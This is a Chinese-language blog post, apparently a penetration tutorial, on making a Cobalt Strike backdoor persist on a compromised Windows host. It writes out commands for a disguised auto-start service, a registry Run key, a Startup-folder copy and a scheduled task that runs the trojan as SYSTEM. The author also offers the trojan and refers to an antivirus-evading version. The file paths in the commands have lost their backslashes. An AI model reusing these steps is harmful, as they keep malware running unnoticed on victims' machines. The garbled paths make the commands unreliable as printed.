简介后门利用持久化是内外渗透一项基本功,平常程序主要通过系统服务、注册表、开始菜单启动等三种方式实现程序自启,后门也是如此。
首先使用cobalt strike生成木马程序,这里就不再介绍了,如果哪位大师傅需要请直接联系我qq即可。
这里可以看到已经有一台受控端上线。
系统服务自启
直接控制台执行以下命令即可,或者直接新建个bat文件-上传-执行也可以
sc create "Share" binpath= "C:UsersxiaomDesktoptest.exe"
sc description "Share" "Windwos文件共享服务"
sc config "Share" start= auto
net start "Share"
默认情况下,会提示拒绝访问,意思是权限不够。
shell 1.bat
可以看到已经上线,但是几秒后就关闭了。因为直接使用cs生成的exe木马无法通过服务自启动,会报错:服务没有及时响应启动或控制请求。
可以使用我之前写的免杀马,可以通过以上方式实现自启,并且还是system权限。
注册表自启
利用 控制台reg命令新增一个名为“后门”的自启项,权限是管理员,但不是system。
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "后门" /t REG_SZ /d "C:UsersxiaomDesktoptest.exe" /f
开始菜单自启
利用copy将后门复制到开始菜单中的“启动”里面也可以实现自启。比较简单就不配图了。权限是管理员,但不是system
copy C:usersxiaomdesktoptest.exe "%programdata%MicrosoftWindowsStart MenuProgramsStartup"
任务计划自启
任务计划自启是最近恶意软件经常使用的手段,使用简单更隐蔽。
通过下面命令,可以实现开机自启,且为system权限~,非常强大。
schtasks /create /tn "后门" /tr C:usersxiaomdesktoptest.exe /sc onstart /NP /ru "System" start %systemroot% tasks
若要删除任务
schtasks /delete /tn "后门" /F
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容